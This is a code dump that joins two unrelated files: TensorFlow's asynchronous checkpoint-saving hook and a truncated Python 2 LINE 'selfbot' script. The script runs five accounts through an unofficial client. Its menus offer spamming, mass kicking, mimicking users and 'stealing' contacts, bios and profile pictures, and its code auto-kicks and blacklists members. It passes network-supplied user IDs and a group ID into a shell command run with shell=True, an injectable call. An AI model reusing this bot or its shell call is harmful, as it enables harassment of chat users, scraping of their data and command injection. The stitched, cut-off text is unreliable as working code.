# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import training_util
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir,
save_secs=None,
save_steps=None,
saver=None,
checkpoint_basename="model.ckpt",
scaffold=None,
listeners=None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
logging.info("Create AsyncCheckpointSaverHook.")
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._write_graph_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
# We do write graph and saver_def at the first call of before_run.
# We cannot do this in begin, since we let other hooks to change graph and
# add variables in begin. Graph is finalized after all begin calls.
def _write_graph_fn(self):
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
self._write_graph_thread = threading.Thread(target=_write_graph_fn,
args=[self])
self._write_graph_thread.start()
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context): # pylint: disable=unused-argument
return SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context, run_values):
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
logging.info("Triggering checkpoint. %s", global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
if self._write_graph_thread:
logging.info("Waiting for any pending write_graph to finish.")
self._write_graph_thread.join()
last_step = session.run(self._global_step_tensor)
# Save the last checkpoint synchronously if needed.
if last_step != self._timer.last_triggered_step():
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
# Skip saving on step 0
if step == 0:
return
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
SessionLog(
status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path),
step)
for l in self._listeners:
l.after_save(session, step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
if not asynchronous:
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
|
5Bot.Kris.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
cl = LINETCR.LINE() #Luffy
#cl.login(qr=True)
cl.login(token="token")
cl.loginResult()
ki = LINETCR.LINE() #Zorro
#ki.login(qr=True)
ki.login(token="token")
ki.loginResult()
kk = LINETCR.LINE() #Sanji
#kk.login(qr=True)
kk.login(token="token")
kk.loginResult()
kc = LINETCR.LINE() #Ussop
#kc.login(qr=True)
kc.login(token="token")
kc.loginResult()
ks = LINETCR.LINE() #Chooper
#ks.login(qr=True)
ks.login(token="token")
ks.loginResult()
satpam = LINETCR.LINE() #
satpam.login(token="token")#6
#satpam.login(qr=True)
satpam.loginResult()
print "login success bos"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
Owner : ✰Ќriֆ✰
-==================-
◄]·♦·Menu For Public·♦·[►
[•]Help
[•]Key
[•]Mimin
[•]Creator
[•]Time
[•]Say....
[•]Wkwkwk/Wkwk/Wk/wkwkwk/wkwk/wk
[•]Hehehe/Hehe/He/hehehe/hehe/he
[•]Galau
[•]You
[•]Hadeuh
[•]Please
[•]Haaa
[•]Lol
[•]Hmmm/Hmm/Hm/hmmm/hmm/hm
[•]Welcome
[•]Woy
[•]wiki
[•]lyric
[•]instagram
[•]music
[•]youtube
[•]Vidio
[•]Bc
[•]Up
[•]Berapa besar cinta
[•]Apakah
[•]Siapakah cewek
[•]Siapakah cowok
[•]Adakah
[•]Cakepkah
[•]T-eng
[•]T-japan
[•]T-thai
[•]T-id
-==================-
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
-==================-
"""
Keyowner ="""✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
Owner : ✰Ќriֆ✰
-==================-
◄]·♦·Menu For Owner·♦·[►
[•]Kick ...
[•]Invite (by mid)
[•]Undang (Invite user by kontak)
[•]Adminlist
[•]Bot Add @
[•]Spam... (contoh spam on 10 tes)
[•]Bot? (cek kontak bot)
[•]Cancel (cancel undangan tertunda)
[•]clean invites
[•]clear invites
[•]Message change:...
[•]Message add:...
[•]Message
[•]Comment:...
[•]Add comment:...
[•]Jam on/off
[•]Change clock
[•]Jam Update
[•]Status (cek status room)
[•]Cctv
[•]Intip
[•]Toong
[•]Nk
[•]Tajong
[•]Vkick
[•]Emak/Abah
[•]Kill
[•]Absen/Respon
[•]ifconfig
[•]system
[•]cpu
[•]kernel
[•]Debug speed
[•]Bot speed
[•]Speed respon
[•]Turunin
[•]Ancurin
[•]Turun lagi
[•]Spbot
[•]Sp asl
[•]Speedbot
[•]Speed
-==================-
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
-==================-
"""
Setgroup ="""
◄]·♦·Menu For Admin·♦·[►
-==================-
[•]Cancel
[•]Buka qr/Open qr
[•]link open
[•]Tutup qr/Close qr
[•]link close
[•]Rejectall (reject semua invite)
[•]Protect:hight/low
[•]Auto blockqr:off/on
[•]Namelock:on/off
[•]Blockinvite:on/off
[•]Joinn on/off (kick protect join)
[•]Cancel on/off (cancel semua undangan)
[•]Qr on/off (protect qr)
[•]Contact On/off
[•]Join on/off (auto join bot)
[•]Gcancel:on/off (invite grup)
[•]Leave on/off
[•]Share on/off
[•]Add on/off
[•]Cancelall (canccel all invite)
[•]Comment off/on
[•]Backup:on/off
[•]Info Group
[•]ginfo
[•]Group id
[•]TL:....
[•]Gn
[•]LG
[•]LG2
[•]group list
[•]My mid
[•]Mid Bot
[•]Bot restart
[•]Turn off bots
[•]Allbio: (ganti bio stat bot)
[•]Myname: (ganti nama bot)
[•]Banlist
[•]Cek ban
[•]Kill ban
[•]Blacklist @
[•]Banned @
[•]Mid @"
[•]Unban @
[•]Ban
[•]Unban
[•]Steal group pict
[•]Steal cover @
[•]Midpict:..
[•]Steal pict
[•]Steal bio
[•]Steal mid
[•]Steal contact
[•]Mimic on/off
[•]Targetlist
[•]Mimic target
[•]Target @
[•]Del target @
[•]copy @
[•]Backup
[•]Spamcontact @
[•]GBc
[•]Pm cast
[•]Bot like
[•]One piece
[•]Kabur all
[•]Kabur
[•]Bot kadieu
[•]Asupka:
[•]Invite me
[•]Remove all chat
[•]Admin add @ (by tag)
[•]Admin remove @
[•]Cleanse
[•]Ready op
[•]Greet
👑Hanya Untuk Owner and Admin👑
-==================-
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
-==================-
"""
KAC=[cl,ki,kk,kc,ks]
DEF=[ki,kk,kc,ks]
mid = cl.getProfile().mid #Luffy
Amid = ki.getProfile().mid #Zorro
Bmid = kk.getProfile().mid #Sanji
Cmid = kc.getProfile().mid #Ussop
Dmid = ks.getProfile().mid #Chooper
Smid = satpam.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid]
induk=[mid]
Creator=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1"]
admin=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1","mid semua bot"] #Krisna,kris,
owner=["u31ef22df7f538df1d74dc7f756ef1a32","u9cc2323f5b84f9df880c33aa9f9e3ae1"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"""тerima Kasih Sudah Menambahkan Aku Jadi Teman
≫ Aku Ga Jawab PM Karna aq Cuma Bot Protect ≪
>>✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰<<
≫ bot protect ≪
≫ SelfBot ≪
ṡȗƿƿȏяṭєԀ ɞʏ:
☆ FS3I FAMILY ☆
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
☆ ONE PIECE BOT PROTECT ☆
Idline: http://line.me/ti/p/GkwfNjoPDH""",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By😊\n☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"pname":True,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"qr":True,
"namelock":True,
"Backup":False,
"AutoKick":True,
"Mimic":True,
"Protectjoin":True, # Ga Kepake(Yang Gabung langsung di kick :D) Udah Udah ada Protect Cancell
"Protectcancl":True,
"protectionOn":True,
"winvite":False,
"pname":{},
"pro_name":{},
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ☞ ' + Name
wait2['ROM'][op.param1][op.param2] = '☞ ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
pass
G.name = wait['pname'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
pass
if op.param2 in DEF:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = cl.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
cl.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel😛")
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in Creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Creator:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Creator:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Dmid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Dmid:
if op.param2 in mid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Amid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Bmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Cmid:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
X = cl.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
kk.acceptGroupInvitation(op.param1)
kc.acceptGroupInvitation(op.param1)
ks.acceptGroupInvitation(op.param1)
G = ki.getGroup(op.param1)
if op.param2 in wait["blacklist"]:
pass
else:
